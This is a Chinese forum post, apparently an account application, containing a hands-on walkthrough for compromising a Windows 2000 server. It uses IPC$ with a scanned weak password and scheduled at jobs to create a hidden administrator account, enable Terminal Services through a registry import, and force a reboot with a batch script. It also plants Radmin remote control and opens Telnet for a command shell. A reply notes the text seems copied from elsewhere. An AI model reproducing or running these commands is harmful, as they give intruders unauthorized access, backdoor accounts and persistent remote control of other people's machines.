发表于 2015-10-25 16:05

申请ID:YangYu

1、申请ID:YangYu
2、个人邮箱:yangyu13777@126.com
3、原创技术文章:
我从事的是程序方面的工作,但对破解方面不是很了解,想向各位高手学习一下,特申请账号。IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。 咱们说的IPC$,其中的“$”符号带有隐藏的含义,一般存在IPC$漏洞的主机都开放着139或者是445端口。本文章主要讲解的是纯手工式基于DOS命令下进行的一个**。

测试环境:Windows Advanced server 2000服务器 (虚拟机测试)
工具:CMD

1.咱们先来看下我们的测试环境为Windows Advanced server 2000服务器 ,其中我们在虚拟机中测试我们的IPC$**。
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/131428ya9oo5ocq05owmcc.jpg
2.通过X-Scan扫描器,我们扫描出我们的Win2000系统的弱口令为123456 ,如下图是我们的扫描结果~
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/13150126geoohoz9wsuamn.jpg
3.此时我们将对192.168.1.125进行一个ipc$连接。直接在本机CMD下执行net use \\192.168.1.125 123456 /user:administrator 此时我们再通过net use 进行查看建立的连接,状态为OK状态,表示咱们的连接成功。
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/131532qkk4p14uruqaxqz2.jpg
4.此时我们先去服务器上执行创建用户以及提权的命令,我们先用net time .\\192.168.1.125 执行查看对方的服务器时间,通过此命令查看了了对方的时间为10:49,此时我们最好使用的是24小时制。我们用at添加一项计划任务。添加我们的创建用户执行的命令。输入“at \\192.168.1.125 22:53 net user unis$ unis /add” 。
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/131604ggfpow37ofufgepf.jpg
4.此时我们查看对方的作业以及时间是否已经执行了我们之前的作业。使用net time \\192.168.1.125执行查看对方的时间,输入“at \\192.168.1.125查看刚才的作业是否已经完成,如果列表为空表示刚才我们添加的作业已经完成”
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/131620f2qroxz22rm2r262.jpg
5.此时我们应该将该账户从user提权到我们的Administrators组里,我们先判断对方的时间,再进行一个时间制的作业添加,最后查看作业的状态。提升管理权的作业命令“at \\192.168.1.125 net localgroup administrators unis$ /add ” 最后执行at .\\192.168.1.125发现作业的存在,此时我们等待作业的执行。
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/131633aj0aa8fi07f580az.jpg
6.此时我们通过命令去开启对方的终端服务,因为对方的是2000服务器,我们使用导入注册表的方式进行开启,我们创建一个remote.reg的文件,其中的内容是咱们2000服务器开启终端后的一个注册表值的状态,内容如下:
Windows Registry Editor Version 5.00

"Enabled"="0"

"ShutdownWithoutLogon"="0"

"EnableAdminTSRemote"=dword:00000001

"TSEnabled"=dword:00000001

"Start"=dword:00000002

"Start"=dword:00000002

"Hotkey"="1"

"PortNumber"=dword:00000D3D

"PortNumber"=dword:00000D3D
7.此时我们要做的是复制到对方的一个共享目录下,然后通过命令进行一个导入注册表那么终端就开了。我们使用copy命令将此终端注册表文件拷贝到对方的C$下,为了便于Copy,我就先把remote.reg放入到本地C盘,(C盘路径下)键入命令:“copy remote.reg \\192.168.1.125\c$” ,当提示复制成功的时候,说明对方的默认共享C$ 已经拷贝成功,此时我们先判断对方时间为23:09分,我们添加一项将remote.reg导入注册表的作业,命令:“at \\192.168.1.125 23:11 regedit /s c:\remote.reg”
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/131647cecoim3w7ows33ty.jpg
8.由于对方的主机为2000高级服务器版的系统,如果你**的非2000可以直接登录终端。开启终端后必须执行重启后才能进行连接,此时我们执行一条批处理进行一个强制重启对方的,该批处理针对设备强行重启,我们制作一个批处理为restart.bat。代码如下:
@ECHO OFF & cd/d %temp% & echo > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
9.此时我们用另一种将对方盘符映射到本地磁盘的方法,将该批处理拷贝到对方的磁盘中,进行一个批处理的执行,键入映射对方盘符命令“net use X:\\192.168.1.125 \c$” (该命令表示把对方的C默认共享盘映射到本地的X盘中。)提示“命令成功后”我们查看我的电脑看到一个X的网络驱动器,就是我们映射的,打开可以看到远程计算机C盘的文件。
http://www.cnhonkerarmy.com/data/attachment/album/201209/08/131700mngmstkr4mv9nfsk.jpg
10.映射成功的磁盘,我们可以对里面的文件进行增删的操作,此时我们将我们制作好的强行重启的restart.bat批处理放入到映射的C$里面。最后执行一项作业,该作业就是执行C$下的restart.bat。我们还是线判断对方时间为23:23 。我们输入命令“at \\192.168.1.125 23"26 c:\restart.bat” 表示在23:26时间远程主机执行restart.bat批处理、
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090719z69nn6ss5tigsgtx.jpg
11.我们等待到23:26分,此时任务不存在,远程主机也执行重启,由于我们在虚拟机进行测试,这里就给大家看下虚拟机的结果吧。由于远程主机已经关机了,此时我们建立的连接已经完全断开了,我们使用net use查看ipc$的状态
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090742f1opjfizansa5ej3.jpg
12.此时我们先将断开的连接删除,包括c$的连接,删除X的映射的命令为“net use X: /del ” 将对方的IPC$也一起删除,执行命令“net use \\192.168.1.125 /ipc$ /del”
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090744kh27cqr2uy5ttkt2.jpg
13.此时我们通过mstsc登录192.168.1.125的终端进行尝试登录,发现能登录我们执行我们刚才创建的用户和账户进行登录,此时我们就已经**到这台高级服务器版2000的服务器。这种方式纯属我们手工通过DOS执行一些命令进行**的。
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090746pv22h014f2p0p242.jpg

三、Radmin远控的提权法
1.我们还是先建立我们的IPC$连接,因为我们已经得到了管理员的账号和密码。键入命令:"net use \\192.168.1.125 123456 /user:administrator 。
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090827fnasa7cszo337syu.jpg
2.建立之后我们直接copy咱们Radmin远控服务端的两个文件,分别为r_server+Admdll.dll文件,直接输入命令"copy r_server.exe \\192.168.1.125\c$"和copy Admdll.dll \\192.168.1.125\c$“。复制成功后,我们先判断主机的时间,判断后,在后一分钟执行一条点击r_server.exe的命令作业,我们键入“at \\192.168.1.125 00:28 c:\r_server.exe(前面的00:27的时候时间正巧跳到了00:27我们的作业被判断到明日了。)
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090829lz8b44zfjibk8qfw.jpg
3.此时我们不需要启动r_server服务,直接打开我们的radmin客户端进行连接,发现能够连接,此时我们就可以控制远程服务器了~默认端口为4899,无需密码进行连接。
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090831ef9b2fztrf1innvn.jpg
三、通过OpenTelnet 开服务器的Telnet获得cmshell权限
测试环境:Advanced Server 2000
工具:opentelnet.exe
1.如果我们不通过IPC$**,只得到对方的管理员弱口令和知道对方已经开启了ipc$,只要通过ipc$的通过,我们就可以通过opentelnet.exe打开对方的Telnet,所谓的telnet就是我们所说的远程主机的cmdshell,当我们拿下cmdshell的时候,我们就可以执行很多命令了。我们先看下opentelnet的参数。
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090748g2p2q66ulkbdxbar.jpg
2.上面的格式为:telnet \\ serverusernamepassword NTLMAuthor telnetport 。其中NTLM值默认是2,如果我们输入2,即使开启了远程的telnet也无法执行命令,因此我们应该输入值“0” 。 此时呢 我们不需要与远程主机进行建立ipc$,直接有了管理员权限的用户名和对方开启ipc$即可进行一个Telnet的远程强制开启。
我们输入命令:opentelnet .\\192.168.1.125 unis$ unis 0 99表示用99端口进行连接telnet。
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090751vaaba7eei6ha66ia.jpg
我们已经成功了,此时我们可以使用命令“ telnet 192.168.1.125 99" 进入远程主机的 telnet执行cmd命令
http://www.cnhonkerarmy.com/data/attachment/album/201209/09/090824o9f9o1g379o19zyo.jpg




Hmily 发表于 2015-11-2 18:09

这文章搜索一下好像很多地方都有,而且是好多年前的,是你原创的吗?
页: [1]
查看完整版本: 申请ID:YangYu